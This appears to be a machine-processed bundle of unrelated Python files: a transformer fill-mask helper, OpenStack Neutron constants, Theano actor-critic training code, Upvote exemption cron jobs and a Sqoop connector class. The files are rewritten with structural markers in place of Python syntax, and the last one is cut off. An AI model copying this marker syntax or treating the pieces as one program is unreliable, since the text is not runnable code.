bpe_sentence.split()[1:-1]<block_end><return>tokens.long()<block_end><def_stmt>fill_mask self masked_input:str topk:int=5<block_start>masked_token="__"<assert_stmt>(masked_token<in>masked_input<and>masked_input.count(masked_token)<eq>1) "Please add one {0} token for the input, eg: 'He is a {0} guy'".format(masked_token)<line_sep>text_spans=masked_input.split(masked_token)<line_sep>text_spans_bpe=((" {0} ".format("<mask>")).join([" ".join(self.bpe.tokenize(text_span.rstrip()))<for>text_span text_spans]).strip())<line_sep>tokens=self.task.source_dictionary.encode_line("<s> "+text_spans_bpe+" </s>" append_eos=<false> add_if_not_exist=<false> )<line_sep>masked_index=torch.nonzero(tokens<eq>self.task.mask_idx as_tuple=<false> )<if_stmt>tokens.dim()<eq>1<block_start>tokens=tokens.unsqueeze(0)<block_end><with_stmt>torch.no_grad()<block_start>features,_=self.model(tokens.long().to(device=self.device) features_only=<false> return_all_hiddens=<false> )<block_end>logits=features[0 masked_index :].squeeze()<line_sep>prob=logits.softmax(dim=0)<line_sep>_,index=prob.topk(k=topk dim=0)<line_sep>topk_predicted_token_bpe=self.task.source_dictionary.string(index)<line_sep><return>[bpe.replace("##" "")<for>bpe topk_predicted_token_bpe.split()]<block_end>@torch.no_grad()<def_stmt>predict_output self sentence:str *addl_sentences add_special_tokens:bool=<true> no_separator:bool=<false> show_probs:bool=<false> <arrow>Union[str Dict]<block_start><assert_stmt>("sentence_classification_head"<in>self.model.classification_heads) "need pre-trained sentence_classification_head to make predictions"<line_sep>tokens=self.encode(sentence *addl_sentences add_special_tokens=add_special_tokens no_separator=no_separator )<with_stmt>torch.no_grad()<block_start>prediction=self.predict("sentence_classification_head" tokens return_logits=self.args.regression_target )<if_stmt>self.args.regression_target<block_start><return>prediction.item()<block_end># float
label_fn=<lambda>label:self.task.label_dictionary.string([label+self.task.label_dictionary.nspecial])<if_stmt>show_probs<block_start>probs=softmax(prediction.cpu().numpy())<line_sep>probs=probs.tolist()<line_sep>probs={label_fn(i):prob<for>i,prob enumerate(probs)}<line_sep><return>probs<block_end><block_end><return>label_fn(prediction.argmax().item())<block_end># str
@torch.no_grad()<def_stmt>predict_tags self sentence:str no_separator:bool=<false><block_start>label_fn=<lambda>label:self.task.label_dictionary.string([label])<line_sep>tokens,words=self.encode(sentence no_separator=no_separator return_bpe=<true> )<line_sep># Get first batch and ignore <s> & </s> tokens
preds=(self.predict("sequence_tagging_head" tokens )[0 1:-1 :].argmax(dim=1).cpu().numpy())<line_sep>labels=[label_fn(int(pred)+self.task.label_dictionary.nspecial)<for>pred preds]<line_sep><return>[(word label)<for>word,label zip(words labels)]<block_end><block_end> |
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
<import_from_stmt>neutron_lib.plugins constants<as>p_const<line_sep># Maps extension alias to service type that
# can be implemented by the core plugin.
EXT_TO_SERVICE_MAPPING={'fwaas':p_const.FIREWALL 'vpnaas':p_const.VPN 'metering':p_const.METERING 'router':p_const.L3 'qos':p_const.QOS }<line_sep># Maps default service plugins entry points to their extension aliases
DEFAULT_SERVICE_PLUGINS={'auto_allocate':'auto-allocated-topology' 'tag':'tag' 'timestamp':'timestamp' 'network_ip_availability':'network-ip-availability' 'flavors':'flavors' 'revisions':'revisions' }<line_sep> |
<import_stmt>logging<import_stmt>theano<import_from_stmt>theano.gradient disconnected_grad<import_from_stmt>theano tensor<import_from_stmt>blocks.graph ComputationGraph<import_from_stmt>blocks.filter VariableFilter<import_from_stmt>blocks.bricks Linear NDimensionalSoftmax<import_from_stmt>blocks.bricks.base application<import_from_stmt>blocks.roles OUTPUT add_role WEIGHT<import_from_stmt>blocks.utils dict_subset shared_floatx_nans<import_from_stmt>blocks_extras.bricks.sequence_generator2 SoftmaxReadout MergeReadout<line_sep>logger=logging.getLogger(__name__)<class_stmt>ReinforceReadout(SoftmaxReadout)<block_start><def_stmt>__init__ self reward_brick entropy=<none> **kwargs<block_start>super(ReinforceReadout self).__init__(**kwargs)<line_sep>self.reward_brick=reward_brick<line_sep>self.entropy_coof=entropy<line_sep>self.value_prediction=Linear(output_dim=1 name='value_prediction')<line_sep>self.children<augadd>[reward_brick self.value_prediction]<line_sep>self.costs.inputs<augadd>['attended' 'attended_mask']<block_end><def_stmt>_push_allocation_config self<block_start>super(ReinforceReadout self)._push_allocation_config()<line_sep>self.value_prediction.input_dim=self.get_dim('states')<block_end>@application<def_stmt>costs self application_call prediction prediction_mask groundtruth groundtruth_mask **inputs<block_start>states=disconnected_grad(inputs['states'])<line_sep>merged=self.merge(**dict_subset(inputs self.merge_names))<line_sep># Compute log-probabilities for the predicted tokens
log_probs=-self.all_scores(prediction merged)<times>prediction_mask<line_sep># Compute per-token rewards
rewards=self.reward_brick.apply(prediction prediction_mask groundtruth groundtruth_mask).sum(axis=-1)<line_sep># Encourage entropy by adding negated log-probs to the rewards
application_call.add_auxiliary_variable(log_probs name='log_probs')<if_stmt>self.entropy_coof<block_start>rewards<augadd>self.entropy_coof<times>disconnected_grad(-log_probs)<block_end>future_rewards=rewards[::-1].cumsum(axis=0)[::-1]<line_sep>baselines=self.value_prediction.apply(states)[: : 0]<line_sep>application_call.add_auxiliary_variable(baselines name='baselines')<line_sep># Compute baseline error
centered_future_rewards=future_rewards-baselines<line_sep>baseline_errors=((centered_future_rewards<times>disconnected_grad(prediction_mask))<power>2).sum(axis=0)<line_sep>application_call.add_auxiliary_variable(baseline_errors name='baseline_errors')<line_sep># The gradient of this will be the REINFORCE 1-sample
# gradient estimate
costs=(disconnected_grad(centered_future_rewards)<times>log_probs<times>prediction_mask).sum(axis=0)<line_sep># Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(rewards name='rewards')<line_sep>application_call.add_auxiliary_variable(log_probs.copy() name='prediction_log_probs')<line_sep><return>costs<block_end><block_end><class_stmt>CriticReadout(MergeReadout)<block_start><def_stmt>__init__ self num_tokens value_softmax=<false> same_value_for_wrong=<false> groundtruth_word_bonus=<false> dueling_outputs=<false> **kwargs<block_start>self.value_softmax=value_softmax<line_sep>self.same_value_for_wrong=same_value_for_wrong<line_sep>self.groundtruth_word_bonus=groundtruth_word_bonus<line_sep>self.dueling_outputs=dueling_outputs<line_sep>super(CriticReadout self).__init__(post_merge_dim=num_tokens **kwargs)<line_sep>self.costs.inputs=(['prediction' 'prediction_mask' 'groundtruth' 'groundtruth_mask']+self.input_names)<block_end><def_stmt>_allocate self<block_start>w=shared_floatx_nans((self.get_dim('states') ) name='add_weights')<line_sep>add_role(w WEIGHT)<line_sep>self.parameters.append(w)<block_end><def_stmt>_initialize self<block_start>self.weights_init.initialize(self.parameters[0] self.rng)<block_end># For compatibility with Blocks-extras
<def_stmt>sample self<block_start><raise>NotImplementedError()<block_end># For compatibility with Blocks-extras
<def_stmt>scores self<block_start><pass><block_end>@application<def_stmt>costs self prediction prediction_mask groundtruth groundtruth_mask **inputs<block_start>outputs=self.all_outputs(groundtruth groundtruth_mask **inputs)<line_sep># It does not matter what we return here, as long as it contains
# the values in the computation graph.
<return>outputs.sum()<block_end>@application<def_stmt>all_outputs self application_call groundtruth groundtruth_mask **inputs<block_start>outputs=self.merge(**dict_subset(inputs self.merge_names))<line_sep>indices=tensor.repeat(tensor.arange(groundtruth.shape[1]) groundtruth.shape[0])<if_stmt>self.value_softmax<block_start>logger.debug('Applying value softmax')<line_sep>outputs=(tensor.addbroadcast(outputs[: : :1] 2)+self.softmax.apply(outputs[: : 1:] extra_ndim=1))<block_end><if_stmt>self.same_value_for_wrong<block_start>logger.debug('Same value for apriori wrong actions')<line_sep>wrong_output=outputs[: : 0]<line_sep>outputs=outputs[: : 1:]<line_sep>wrong_mask=tensor.ones_like(outputs[0])<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>outputs=(outputs<times>(1-wrong_mask)+wrong_output[: : <none>]<times>wrong_mask)<line_sep>application_call.add_auxiliary_variable(wrong_mask name='wrong_mask')<block_end><if_stmt>self.groundtruth_word_bonus<block_start>logger.debug('Bonus for grondtruth words')<line_sep>wrong_mask=tensor.ones_like(outputs[0])<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>w,=self.parameters<line_sep>bonuses=inputs['states'].dot(w)<line_sep>outputs<augadd>bonuses[: : <none>]<times>(1-wrong_mask)[<none> : :]<block_end><if_stmt>self.dueling_outputs<block_start>logger.debug('Dueling outputs a-la dueling networks')<line_sep>base_output=outputs[: : [0]]<line_sep>dueling_outputs=outputs[: : 1:]<line_sep>outputs=base_output+dueling_outputs-dueling_outputs.mean(axis=2 keepdims=<true>)<block_end><return>outputs<block_end>@application<def_stmt>outputs self groundtruth groundtruth_mask **inputs# Copy-pasted from all_outputs, because Theano does not support ellipsis
<block_start>outputs=self.merge(**dict_subset(inputs self.merge_names))<line_sep>indices=tensor.repeat(tensor.arange(groundtruth.shape[1]) groundtruth.shape[0])<if_stmt>self.value_softmax<block_start>logger.debug('Applying value softmax')<line_sep>outputs=(tensor.addbroadcast(outputs[: :1] 1)+self.softmax.apply(outputs[: 1:]))<block_end><if_stmt>self.same_value_for_wrong<block_start>logger.debug('Same value for apriori wrong actions')<line_sep>wrong_output=outputs[: 0]<line_sep>outputs=outputs[: 1:]<line_sep>wrong_mask=tensor.ones_like(outputs)<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>outputs=(outputs<times>(1-wrong_mask)+wrong_output[: <none>]<times>wrong_mask)<block_end><if_stmt>self.groundtruth_word_bonus<block_start>logger.debug('Bonus for grondtruth words')<line_sep>wrong_mask=tensor.ones_like(outputs)<line_sep>wrong_mask=tensor.set_subtensor(wrong_mask[indices groundtruth.T.flatten()] 0)<line_sep>w,=self.parameters<line_sep>bonuses=inputs['states'].dot(w)<line_sep>outputs=outputs+bonuses[: <none>]<times>(1-wrong_mask)<block_end><if_stmt>self.dueling_outputs<block_start>logger.debug('Dueling outputs a-la dueling networks')<line_sep>base_output=outputs[: [0]]<line_sep>dueling_outputs=outputs[: 1:]<line_sep>outputs=base_output+dueling_outputs-dueling_outputs.mean(axis=1 keepdims=<true>)<block_end><return>outputs<block_end><block_end><class_stmt>ActorCriticReadout(SoftmaxReadout)<block_start>"""Actor-critic
Params
------
bos_token : int
The token used to pad critic input. Critic needs to do
at least one extra step compared to the actor in order
to get the first glimpse of the ground-truth sequence
before predicting the actual values.
"""<def_stmt>__init__ self reward_brick compute_targets solve_bellman freeze_actor freeze_critic critic_uses_actor_states critic_uses_groundtruth critic=<none> critic_burnin_steps=<none> critic_loss=<none> critic_policy_t=<none> entropy_reward_coof=<none> cross_entropy_reward_coof=<none> trpo_coef=<none> discount=<none> value_penalty=<none> value_penalty_type=<none> accumulate_outputs=<false> use_value_biases=<none> actor_grad_estimate=<none> bos_token=<none> **kwargs<block_start>super(ActorCriticReadout self).__init__(**kwargs)<line_sep>self.reward_brick=reward_brick<line_sep>self.critic=critic<line_sep>self.freeze_actor=freeze_actor<line_sep>self.freeze_critic=freeze_critic<line_sep>self.critic_uses_actor_states=critic_uses_actor_states<line_sep>self.critic_uses_groundtruth=(critic_uses_groundtruth<if>critic_uses_groundtruth<is><not><none><else><true>)<line_sep>self.critic_burnin_steps=(critic_burnin_steps<if>critic_burnin_steps<is><not><none><else>0)<line_sep>self.critic_loss=(critic_loss<if>critic_loss<is><not><none><else>"L2")<line_sep>self.value_summand=Linear(output_dim=1 name='summand')<line_sep>self.softmax_t=1.<line_sep>self.critic_policy_t=(critic_policy_t<if>critic_policy_t<is><not><none><else>1.0)<line_sep>self.epsilon=0.<line_sep>self.discount=(discount<if>discount<is><not><none><else>1.)<line_sep>self.entropy_reward_coof=(entropy_reward_coof<if>entropy_reward_coof<is><not><none><else>0.)<line_sep>self.cross_entropy_reward_coof=(cross_entropy_reward_coof<if>cross_entropy_reward_coof<is><not><none><else>0.)<line_sep>self.trpo_coef=(trpo_coef<if>trpo_coef<is><not><none><else>0.)<line_sep>self.value_penalty=value_penalty<line_sep>self.value_penalty_type=(value_penalty_type<if>value_penalty_type<is><not><none><else>"L2")<line_sep>self.compute_targets=compute_targets<line_sep>self.solve_bellman=solve_bellman<line_sep>self.accumulate_outputs=accumulate_outputs<line_sep>self.use_value_biases=(use_value_biases<if>use_value_biases<is><not><none><else><true>)<line_sep>self.actor_grad_estimate=(actor_grad_estimate<if>actor_grad_estimate<else>'all_actions')<line_sep>self.bos_token=bos_token<line_sep>self.softmax=NDimensionalSoftmax()<line_sep>self.children<augadd>[reward_brick self.value_summand self.softmax]<if_stmt>self.critic<block_start>self.children.append(self.critic)<block_end>self.costs.inputs<augadd>['attended' 'attended_mask']<block_end><def_stmt>_push_allocation_config self<block_start>super(ActorCriticReadout self)._push_allocation_config()<line_sep>self.value_summand.input_dim=self.get_dim('attended')<block_end>@application<def_stmt>scores self **inputs<block_start>merged=self.merge(**dict_subset(inputs self.merge_names))<line_sep><return>self.softmax.log_probabilities(merged<times>self.softmax_t extra_ndim=merged.ndim-2)<block_end>@application<def_stmt>costs self application_call prediction prediction_mask groundtruth groundtruth_mask **inputs<block_start><def_stmt>_prediction_subtensor data<block_start><if_stmt>data.ndim<ne>3<block_start><raise>ValueError<block_end>flat_data=data.reshape((data.shape[0]<times>data.shape[1] data.shape[2]))<line_sep>flat_data=flat_data[tensor.arange(flat_data.shape[0]) prediction.flatten()]<line_sep><return>flat_data.reshape((prediction.shape[0] prediction.shape[1]))<block_end>attended=disconnected_grad(inputs.pop('attended'))<line_sep>attended_mask=disconnected_grad(inputs.pop('attended_mask'))<line_sep># Compute the rewards
rewards=self.reward_brick.apply(prediction prediction_mask groundtruth groundtruth_mask)[: : 0]<line_sep>future_rewards=rewards[::-1].cumsum(axis=0)[::-1]<line_sep># Compute the critic outputs
<if_stmt>self.critic<block_start>padding=tensor.repeat(tensor.fill(prediction[0:1] self.bos_token) 1 axis=0)<line_sep>mask_padding=tensor.repeat(tensor.fill(prediction_mask[0:1] 1.) 1 axis=0)<line_sep>padded_prediction=tensor.concatenate([padding prediction])<line_sep>padded_prediction_mask=tensor.concatenate([mask_padding prediction_mask])<if_stmt>self.critic_uses_groundtruth<block_start>critic_context=groundtruth<line_sep>critic_context_mask=groundtruth_mask<block_end><else_stmt><block_start>critic_context=tensor.zeros_like(groundtruth[0:1])<line_sep>critic_context_mask=tensor.zeros_like(groundtruth_mask[0:1])<block_end>critic_kwargs=dict(prediction=padded_prediction prediction_mask=padded_prediction_mask groundtruth=critic_context groundtruth_mask=critic_context_mask inputs=critic_context inputs_mask=critic_context_mask)<if_stmt>self.critic_uses_actor_states<block_start>extra_inputs=disconnected_grad(inputs['states'])<line_sep># We don't need the very last hidden state of the actor
# in extra_inputs. We have to add something instead for the shapes
# to match. It doesn't matter at all, what exactly we add.
critic_kwargs['extra_inputs']=tensor.concatenate([extra_inputs tensor.zeros_like(extra_inputs[0:1])])<block_end>critic_cg=ComputationGraph(self.critic.costs(**critic_kwargs))<line_sep>outputs,=VariableFilter(applications=[self.critic.generator.readout.all_outputs] roles=[OUTPUT])(critic_cg)<line_sep># The first subtensor should be discarded, because it was outputted
# for the padding. In addition to that Q-values from the first
# 'critic_burnin_steps' will be ignored, see later in the code.
outputs=outputs[1:]<block_end><else_stmt><block_start>outputs=self.merge(**dict_subset(inputs self.merge_names))<block_end>prediction_outputs=_prediction_subtensor(outputs)<line_sep># Compute Q adjustments
adjustments=outputs<line_sep>prediction_adjustments=prediction_outputs<if_stmt>self.accumulate_outputs<block_start>prediction_adjustments=prediction_outputs.cumsum(axis=0)<line_sep>adjustments=tensor.inc_subtensor(adjustments[1:] prediction_adjustments[:-1][: : <none>])<block_end># Compute shared additive biases for all Q values
<if_stmt>self.use_value_biases<block_start>value_biases=(self.value_summand.apply(attended)[: : 0]<times>attended_mask).sum(axis=0)<block_end><else_stmt><block_start>value_biases=tensor.zeros_like(adjustments[0 : 0])<block_end>values=adjustments+value_biases[<none> : <none>]<line_sep>prediction_values=prediction_adjustments+value_biases[<none> :]<line_sep>rolled_prediction_mask=tensor.roll(prediction_mask -1 axis=0)<line_sep>rolled_prediction_mask=tensor.set_subtensor(rolled_prediction_mask[-1] 0)<line_sep># Compute probabilities
logs=self.scores(use_epsilon=<false> **inputs)<line_sep>probs=tensor.exp(logs)<if_stmt>self.trpo_coef<block_start>logger.debug("Using TRPO coefficient of {}".format(self.trpo_coef))<line_sep>old_probs=tensor.tensor3('probs')<block_end><else_stmt><block_start>old_probs=tensor.zeros_like(probs)<block_end>prediction_logs=_prediction_subtensor(logs)<line_sep># Compute value targets
value_targets=(disconnected_grad(probs)<times>values).sum(axis=-1)<line_sep>value_targets=tensor.roll(value_targets -1 axis=0)<line_sep>value_targets=(self.discount<times>value_targets<times>rolled_prediction_mask+rewards)<line_sep>value_targets=value_targets.astype(theano.config.floatX)<line_sep>total_costs=0<line_sep># Compute critic cost
<if_stmt><not>self.compute_targets<block_start>logger.debug("Using given targets")<line_sep>value_targets=tensor.matrix('value_targets')<block_end><if_stmt>self.solve_bellman<eq>'no'<block_start>logger.debug("Not solving Bellman, just predicting the rewards")<line_sep>value_targets=rewards.copy(name='value_targets')<block_end><elif_stmt>self.solve_bellman<eq>'without_dp'<block_start>future_rewards=rewards[::-1].cumsum(axis=0)[::-1]<line_sep>logger.debug("Solving Bellman, but without DP")<line_sep>value_targets=future_rewards<block_end><elif_stmt>self.solve_bellman<is><not><true><block_start><raise>ValueError()<block_end>critic_errors=prediction_values-value_targets<if_stmt>self.critic_loss<eq>'L2'<block_start>logger.debug("L2 loss for the critic")<line_sep>critic_costs_per_char=critic_errors<power>2<times>prediction_mask<block_end><elif_stmt>self.critic_loss<eq>'huber'<block_start>logger.debug("Huber loss for the critic")<line_sep>use_L2=tensor.lt(abs(critic_errors) 0.5)<line_sep>critic_costs_per_char=(use_L2<times>critic_errors<power>2+(1-use_L2)<times>abs(critic_errors))<times>prediction_mask<block_end><else_stmt><block_start><raise>ValueError()<block_end>critic_costs=critic_costs_per_char[self.critic_burnin_steps:].sum(axis=0)<if_stmt><not>self.freeze_critic<block_start>total_costs<augadd>critic_costs<block_end># Compute critic Monte-Carlo cost
critic_monte_carlo_costs=((((prediction_values-future_rewards)<power>2)<times>prediction_mask)[self.critic_burnin_steps:].sum(axis=0))<line_sep># Value penalty
<if_stmt>self.value_penalty<block_start>logger.debug("Use value penalty")<if_stmt>self.value_penalty_type<eq>'L2'<block_start>value_deviations=(values-values.mean(axis=-1 keepdims=<true>))<power>2<block_end><elif_stmt>self.value_penalty_type<eq>'L1'<block_start>value_deviations=abs(values-values.mean(axis=-1 keepdims=<true>))<block_end><else_stmt><block_start><raise>ValueError("unknown value penalty type {}".format(self.value_penalty_type))<block_end><if_stmt><not>self.freeze_critic<block_start>total_costs<augadd>(self.value_penalty<times>(value_deviations.sum(axis=-1)<times>prediction_mask)[self.critic_burnin_steps:].sum(axis=0))<block_end><block_end># Compute actor cost
<if_stmt>self.critic# The actor cost will be minimized, that's why values
# must be negated.
<block_start>est_name=self.actor_grad_estimate<if_stmt>est_name<eq>'all_actions'<block_start>disadvantages=disconnected_grad(values.max(axis=-1)[: : <none>]-values)<line_sep>actor_costs=((probs<times>disadvantages).sum(axis=-1)<times>prediction_mask)<line_sep>actor_costs=actor_costs[self.critic_burnin_steps:]<block_end><elif_stmt>est_name.startswith('1_action')# Here we do not provide a target for the first step for
# the reason we lack an estimate of the value of the initial state.
# This is how our critic works.
# Hopefully the network won't unlearn
# to produce a BOS first.
<block_start>future_reward_estimate=(future_rewards<if>est_name.endswith('unbiased')<else>prediction_values)<line_sep>weights=-disconnected_grad(future_reward_estimate[1:]+rewards[:-1]-prediction_values[:-1])<line_sep>actor_costs=((prediction_logs[1:]<times>weights)<times>prediction_mask[1:])<line_sep>actor_costs=actor_costs[self.critic_burnin_steps+1:]<block_end><else_stmt><block_start><raise>ValueError<block_end>actor_costs=actor_costs.sum(axis=0)<line_sep>actor_entropies=(probs<times>-logs).sum(axis=-1)<times>prediction_mask<line_sep>actor_entropies=actor_entropies[self.critic_burnin_steps:].sum(axis=0)<line_sep>old_actor_cross_entropies=(old_probs<times>-logs).sum(axis=-1)<times>prediction_mask<line_sep>old_actor_cross_entropies=old_actor_cross_entropies[self.critic_burnin_steps:].sum(axis=0)<line_sep>critic_policy=disconnected_grad(self.softmax.apply(self.critic_policy_t<times>values extra_ndim=1))<line_sep>critic_cross_entropies=((critic_policy<times>-logs).sum(axis=-1)<times>prediction_mask)<line_sep>critic_cross_entropies=critic_cross_entropies[self.critic_burnin_steps:].sum(axis=0)<line_sep>actor_costs_with_penalties=(actor_costs-self.entropy_reward_coof<times>actor_entropies# But really, should it be minus here, below?
-self.cross_entropy_reward_coof<times>critic_cross_entropies+self.trpo_coef<times>old_actor_cross_entropies)<if_stmt><not>self.freeze_actor<block_start>total_costs<augadd>actor_costs_with_penalties<block_end><else_stmt><block_start>total_costs<augadd>disconnected_grad(actor_costs_with_penalties)<block_end><block_end># Add auxiliary variables for intermediate steps of the computation
application_call.add_auxiliary_variable(rewards name='rewards')<line_sep>application_call.add_auxiliary_variable(value_biases name='value_biases')<line_sep>application_call.add_auxiliary_variable(values.copy() name='values')<line_sep>application_call.add_auxiliary_variable(outputs.copy() name='outputs')<line_sep>application_call.add_auxiliary_variable(prediction_values name='prediction_values')<line_sep>application_call.add_auxiliary_variable(prediction_outputs name='prediction_outputs')<line_sep>application_call.add_auxiliary_variable(value_targets.copy() name='value_targets')<line_sep>application_call.add_auxiliary_variable(probs.copy() name='probs')<line_sep>application_call.add_auxiliary_variable(prediction_logs name='prediction_log_probs')<line_sep># Compute some statistics for debugging
last_character_mask=prediction_mask-rolled_prediction_mask<line_sep>last_character_costs=(critic_costs_per_char<times>last_character_mask).sum(axis=0)<line_sep>mean2_output=(((prediction_outputs<power>2)<times>prediction_mask).sum()/prediction_mask.sum())<power>0.5<line_sep>max_output=abs(prediction_outputs<times>prediction_mask).max()<line_sep>expected_reward=(probs[0]<times>values[0]).sum(axis=-1)<line_sep>application_call.add_auxiliary_variable(last_character_costs name='last_character_costs')<line_sep>application_call.add_auxiliary_variable(critic_costs.mean() name='mean_critic_cost')<line_sep>application_call.add_auxiliary_variable(critic_monte_carlo_costs.mean() name='mean_critic_monte_carlo_cost')<if_stmt>self.critic<block_start>application_call.add_auxiliary_variable(actor_costs.mean() name='mean_actor_cost')<line_sep>application_call.add_auxiliary_variable(actor_entropies.mean() name='mean_actor_entropy')<block_end>application_call.add_auxiliary_variable(expected_reward.mean() name='mean_expected_reward')<line_sep>application_call.add_auxiliary_variable(mean2_output name='mean2_output')<line_sep>application_call.add_auxiliary_variable(max_output name='max_output')<line_sep><return>total_costs<block_end><block_end> |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Cron jobs which perform various Exemption maintenance tasks."""<import_stmt>datetime<import_stmt>logging<import_stmt>webapp2<import_from_stmt>webapp2_extras routes<import_from_stmt>google.appengine.ext deferred<import_from_stmt>upvote.gae.datastore.models exemption<as>exemption_models<import_from_stmt>upvote.gae.datastore.models utils<as>model_utils<import_from_stmt>upvote.gae.lib.exemption api<as>exemption_api<import_from_stmt>upvote.gae.lib.exemption notify<import_from_stmt>upvote.gae.lib.exemption monitoring<import_from_stmt>upvote.gae.utils env_utils<import_from_stmt>upvote.gae.utils group_utils<import_from_stmt>upvote.gae.utils handler_utils<import_from_stmt>upvote.gae.utils user_utils<import_from_stmt>upvote.shared constants<line_sep># Done for the sake of brevity.
EXEMPTION_STATE=constants.EXEMPTION_STATE<class_stmt>ProcessExemptions(handler_utils.CronJobHandler)<block_start>"""Handler for processing exemptions."""<def_stmt>get self<block_start>logging.info('Processing Exemptions...')<line_sep>exm_query=exemption_models.Exemption.query(exemption_models.Exemption.state<eq>EXEMPTION_STATE.REQUESTED)<line_sep>exm_count=0<for_stmt>exm exm_query<block_start>deferred.defer(exemption_api.Process exm.key _queue=constants.TASK_QUEUE.EXEMPTIONS)<line_sep>exm_count<augadd>1<block_end>monitoring.requested_exemptions.Set(exm_count)<line_sep>logging.info('Deferred %d Exemption(s) for processing' exm_count)<block_end><block_end><def_stmt>_NotifyExpirationsInRange start_dt end_dt<block_start>"""Sends an email for all APPROVED Exemptions that expire in the given range.
Args:
start_dt: The starting datetime of the expiration window.
end_dt: The ending datetime of the expiration window.
"""<line_sep># Query for the Keys of all Exemptions that expire in the given range.
exm_query=exemption_models.Exemption.query(exemption_models.Exemption.state<eq>EXEMPTION_STATE.APPROVED exemption_models.Exemption.deactivation_dt<ge>start_dt exemption_models.Exemption.deactivation_dt<l>end_dt)<line_sep>exm_keys=exm_query.fetch(keys_only=<true>)<for_stmt>exm_key exm_keys<block_start>notify.SendExpirationEmail(exm_key)<block_end><block_end><class_stmt>NotifyUpcomingExpirations(handler_utils.CronJobHandler)<block_start>"""Handler for notifying users of upcoming exemption expirations."""<def_stmt>get self<block_start>now=datetime.datetime.utcnow()<line_sep># Notify all users whose Exemptions now have less than a week left, in order
# to give reasonable advance warning (e.g. long weekends, holidays, etc).
one_week_start_dt=now+datetime.timedelta(days=7 hours=-1)<line_sep>one_week_end_dt=now+datetime.timedelta(days=7)<line_sep># Notify all users whose Exemptions now have less that 24 hours left. This
# will act as a final reminder, and will also ensure that even users who
# choose a 1-day Exemption will get an email warning (for what it's worth).
one_day_start_dt=now+datetime.timedelta(days=1 hours=-1)<line_sep>one_day_end_dt=now+datetime.timedelta(days=1)<line_sep>tuples=[(one_week_start_dt one_week_end_dt) (one_day_start_dt one_day_end_dt)]<line_sep># Defer a task for each batch of notifications.
<for_stmt>start_dt,end_dt tuples<block_start>deferred.defer(_NotifyExpirationsInRange start_dt end_dt _queue=constants.TASK_QUEUE.EXEMPTIONS)<block_end><block_end><block_end><class_stmt>ExpireExemptions(handler_utils.CronJobHandler)<block_start>"""Handler for expiring exemptions."""<def_stmt>get self<block_start>logging.info('Expiring Exemptions...')<line_sep>now=datetime.datetime.utcnow()<line_sep>exm_query=exemption_models.Exemption.query(exemption_models.Exemption.state<eq>EXEMPTION_STATE.APPROVED exemption_models.Exemption.deactivation_dt<le>now)<line_sep>exm_count=0<for_stmt>exm exm_query<block_start>deferred.defer(exemption_api.Expire exm.key _queue=constants.TASK_QUEUE.EXEMPTIONS)<line_sep>exm_count<augadd>1<block_end>monitoring.expired_exemptions.Set(exm_count)<line_sep>logging.info('Deferred %d Exemption(s) for expiration' exm_count)<block_end><block_end>ROUTES=routes.PathPrefixRoute('/exemptions' [webapp2.Route('/process' handler=ProcessExemptions) webapp2.Route('/notify-upcoming-expirations' handler=NotifyUpcomingExpirations) webapp2.Route('/expire' handler=ExpireExemptions) ])<line_sep> |
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_from_future_stmt> absolute_import<import_from_stmt>builtins object<import_stmt>logging<import_from_stmt>desktop.lib.python_util force_dict_to_strings<import_from_stmt>sqoop.client.config Config<class_stmt>Connector(object)<block_start><def_stmt>__init__ self id name version link_config job_config config_resources={} **kwargs<block_start>self.id=id<line_sep>self.name=name<line_sep>self.version=version<line_sep>self.job_config=job_config<line_sep>self.link_config=link_config<line_sep>self.config_resources=config_resources<line_sep>setattr(self 'class' kwargs['class'])<block_end>@staticmethod<def_stmt>from_dict connector_dict<block_start>connector_dict.setdefault('link_config' [])<line_sep>connector_dict['link_config']=[Config.from_dict(link_config_dict)<for>link_config_dict connector_dict['link-config']]<line_sep>connector_dict.setdefault('job_config' {})<line_sep>connector_dict['job_config']={}<if_stmt>'FROM'<in>connector_dict['job-config']<block_start>connector_dict['job_config']['FROM']=[Config.from_dict(from_config_dict)<for>from_config_dict connector_dict['job-config']['FROM']]<block_end><if_stmt>'TO'<in>connector_dict['job-config']<block_start>connector_dict['job_config']['TO']=[Config.from_dict(to_config_dict)<for>to_config_dict connector_dict['job-config']['TO']]<block_end>connector_dict['config_resources']=connector_dict['all-config-resources']<line_sep><return>Connector(**force_dict_to_strings(connector_dict))<block_end><def_stmt>to_dict self<block_start>d={'id':self.id 'name':self.name 'version':self.version 'class':getattr(self 'class') 'link-config':[link_config.to_dict()<for>link_config self.link_config] 'job-config':{} 'all-config-resources':self.config_resources}<if_stmt>'FROM'<in>self.job_config<block_start>d['job-config']['FROM']=[job_config.to_dict()<for>job_config self.job_config['FROM']]<block_end><if_stmt>'TO'<in>self.job_config<block_start>d['job-config']['TO']=[job_config.to_dict()<for>job_config 